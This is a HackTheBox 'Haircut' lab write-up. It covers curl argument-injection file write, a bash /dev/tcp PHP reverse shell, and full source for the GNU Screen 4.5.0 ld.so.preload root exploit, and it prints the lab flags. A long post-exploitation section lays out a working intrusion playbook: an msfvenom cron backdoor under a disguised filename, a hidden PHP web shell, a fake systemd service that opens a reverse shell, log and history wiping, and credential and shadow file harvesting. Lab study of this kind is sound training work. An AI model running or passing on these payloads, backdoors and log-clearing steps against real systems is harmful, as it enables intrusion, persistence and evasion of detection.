Post

HackTheBox Haircut

Writeup for HackTheBox Haircut

Posted Updated
By Edwin Tok
6 min read
HackTheBox Haircut

Machine Synopsis

Key Exploitation Techniques:

  • Curl argument injection for arbitrary file write
  • PHP reverse shell deployment via file upload
  • GNU Screen 4.5.0 privilege escalation (CVE-2017-5619)
  • ld.so.preload manipulation for SUID binary exploitation

Reconnaissance & Enumeration

Port Discovery

1
2
3
4
5

$ nmap -sC -sV -A 10.10.10.24
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser

Web Application Analysis

The website displays a “HTB Hairdresser” themed page with minimal functionality.

1
2
3
4
5
6
7
8
9
10
11

# Directory enumeration
$ gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/uploads              (Status: 301) [Size: 194] [--> http://10.10.10.24/uploads/]

# Extended enumeration with file extensions
$ gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html
/index.html           (Status: 200) [Size: 144]
/uploads              (Status: 301) [Size: 194] [--> http://10.10.10.24/uploads/]
/test.html            (Status: 200) [Size: 223]                                  
/hair.html            (Status: 200) [Size: 141]                                  
/exposed.php          (Status: 200) [Size: 446]

exposed_php

Key Finding: /exposed.php contains a form interface, /uploads directory exists but returns 403 Forbidden.

Exploitation

Curl Argument Injection Discovery

exposed_php_2

The /exposed.php endpoint processes user-specified curl arguments through a web form interface.

Vulnerability Analysis:

  • Form accepts curl parameters directly
  • No input validation on curl arguments
  • Arbitrary file write possible via -o flag

PHP Reverse Shell Creation

1
2
3
4
5
6
7
8

# Create PHP reverse shell
$ cat > revshell.php << 'EOF'
<?php system("bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"); ?>
EOF

# Host payload
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80...

Exploitation via File Upload

1
2

# Setup netcat listener
$ nc -nlvp 1234

Exploit Process:

  1. Use curl -o flag to write PHP shell to web directory
  2. Input in exposed.php form: http://10.10.14.12/revshell.php -o /var/www/html/uploads/revshell.php
  3. Access uploaded shell via web browser: http://10.10.10.24/uploads/revshell.php
1
2
3
4

# Reverse shell connection received
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.24] 46038
www-data@haircut:/var/www/html/uploads$ whoami
www-data

Privilege Escalation

SUID Binary Discovery

1
2

www-data@haircut:/var/www/html/uploads$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/screen-4.5.0

Critical Finding: GNU Screen version 4.5.0 SUID binary vulnerable to local privilege escalation.

CVE-2017-5619 Analysis

GNU Screen 4.5.0 contains a privilege escalation vulnerability through ld.so.preload manipulation.

Exploit Components:

  1. libhax.c - Shared library to modify file permissions
  2. rootshell.c - SUID shell for privilege escalation
  3. exploit.sh - Orchestration script

Exploit Development

Component 1: libhax.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

$ cat > libhax.c << 'EOF'
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF

# Compile shared library
$ gcc -fPIC -shared -ldl -o libhax.so libhax.c

Component 2: rootshell.c

1
2
3
4
5
6
7
8
9
10
11
12
13

$ cat > rootshell.c << 'EOF'  
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF

# Compile rootshell
$ gcc -o rootshell rootshell.c

Component 3: exploit.sh

1
2
3
4
5
6
7
8
9

$ cat > exploit.sh << 'EOF'
#!/bin/bash

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
EOF

Payload Deployment

1
2
3
4
5
6
7
8

# Host exploit components
$ python3 -m http.server 80

# Download components on target
www-data@haircut:/tmp$ wget 10.10.14.12/libhax.so
www-data@haircut:/tmp$ wget 10.10.14.12/rootshell  
www-data@haircut:/tmp$ wget 10.10.14.12/exploit.sh
www-data@haircut:/tmp$ chmod +x exploit.sh

Root Shell Achievement

1
2
3
4
5
6
7
8
9
10
11

www-data@haircut:/tmp$ ./exploit.sh
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# whoami
root
# cat /home/maria/user.txt
9a42c4b5a80e862e7f007cc468c035ce
# cat /root/root.txt
c9818e45d1aa8e774c0286dba6ea71ea

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

1
2
3
4
5
6
7
8

# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f haircut_persistence

# Install on target as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
# chmod 700 /root/.ssh

Cron Backdoor

1
2
3
4
5
6
7
8

# Create reverse shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f elf -o backdoor
$ python3 -m http.server 80

# Install persistent backdoor
# wget 10.10.14.12/backdoor -O /usr/bin/.update-system
# chmod +x /usr/bin/.update-system
# echo "*/20 * * * * /usr/bin/.update-system" >> /etc/crontab

Web Shell Maintenance

1
2
3
4
5
6
7
8
9
10
11

# Create PHP backdoor in web directory
# cat > /var/www/html/uploads/.maintenance.php << 'EOF'
<?php 
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
EOF

# Hide from directory listings
# chattr +i /var/www/html/uploads/.maintenance.php

Defense Evasion

Log Cleanup

1
2
3
4
5
6
7
8
9
10
11
12
13

# Clear web server logs
# > /var/log/nginx/access.log
# > /var/log/nginx/error.log

# Clear system logs
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/wtmp
# > /var/log/lastlog

# Clear command histories
# > /root/.bash_history
# > /var/www/.bash_history

Process Hiding

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

# Rename processes to appear legitimate
# cp /bin/bash /usr/bin/systemd-update
# chmod +x /usr/bin/systemd-update

# Create legitimate-looking service files
# cat > /etc/systemd/system/system-update.service << 'EOF'
[Unit]
Description=System Update Service
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/systemd-update -c "bash -i >& /dev/tcp/10.10.14.12/4444 0>&1"
Restart=always

[Install]
WantedBy=multi-user.target
EOF

Lateral Movement Preparation

Network Discovery

1
2
3
4
5
6

# Discover network topology
# ip route show
# arp -a

# Scan internal networks
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done

Credential Harvesting

1
2
3
4
5
6
7
8

# Search for database credentials
# grep -r "password\|mysql\|database" /var/www/ 2>/dev/null

# Extract shadow file for offline cracking
# cp /etc/shadow /tmp/shadow.backup

# Search for SSH keys
# find /home -name "id_*" -o -name "*.pem" 2>/dev/null

Service Enumeration

1
2
3
4
5
6
7
8
9

# List active network services
# ss -tlnp

# Check for internal services
# curl -s http://localhost:8080 2>/dev/null | head -10
# curl -s http://127.0.0.1:3306 2>/dev/null

# Enumerate running processes
# ps aux --forest

Alternative Exploitation Methods

Manual Curl Exploitation

1
2
3
4
5

# Direct command execution via curl
$ curl "http://10.10.10.24/exposed.php" -d "formurl=http://10.10.14.12/test -e /etc/passwd"

# File exfiltration
$ curl "http://10.10.10.24/exposed.php" -d "formurl=file:///etc/passwd -T /tmp/passwd.txt"

Python Web Shell

1
2
3
4
5
6

# Alternative payload: Python reverse shell
$ cat > python_shell.php << 'EOF'
<?php 
system('python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.12\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"');
?>
EOF

Netcat File Transfer

1
2
3
4
5
6

# Alternative file transfer method
# On attacker:
$ nc -nlvp 9999 < exploit.sh

# On target:
www-data@haircut:/tmp$ nc 10.10.14.12 9999 > exploit.sh

Alternative Privilege Escalation

LinPEAS Enumeration

1
2
3
4

# Comprehensive privilege escalation enumeration
www-data@haircut:/tmp$ wget 10.10.14.12/linpeas.sh
www-data@haircut:/tmp$ chmod +x linpeas.sh
www-data@haircut:/tmp$ ./linpeas.sh

Kernel Exploitation

1
2
3
4
5
6

# Check kernel version
www-data@haircut:/tmp$ uname -a
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017

# Search for kernel exploits
$ searchsploit linux kernel 4.4 | grep -i privilege

Docker Escape Analysis

1
2
3

# Check for Docker environment
www-data@haircut:/tmp$ ls -la /.dockerenv 2>/dev/null
www-data@haircut:/tmp$ cat /proc/1/cgroup | grep -i docker

Sudo Misconfiguration Check

1
2
3
4
5

# Check for sudo privileges
www-data@haircut:/tmp$ sudo -l 2>/dev/null

# Check for NOPASSWD entries
www-data@haircut:/tmp$ grep -i nopasswd /etc/sudoers 2>/dev/null

Binary Analysis Tools

Screen Binary Analysis

1
2
3
4

# Detailed binary analysis
$ file /usr/bin/screen-4.5.0
$ strings /usr/bin/screen-4.5.0 | grep -i version
$ ldd /usr/bin/screen-4.5.0

Dynamic Analysis

1
2

# Runtime analysis with strace
www-data@haircut:/tmp$ strace -f /usr/bin/screen-4.5.0 2>&1 | grep -E "(open|write|exec)"
HackTheBox
linux
This post is licensed under CC BY 4.0 by the author.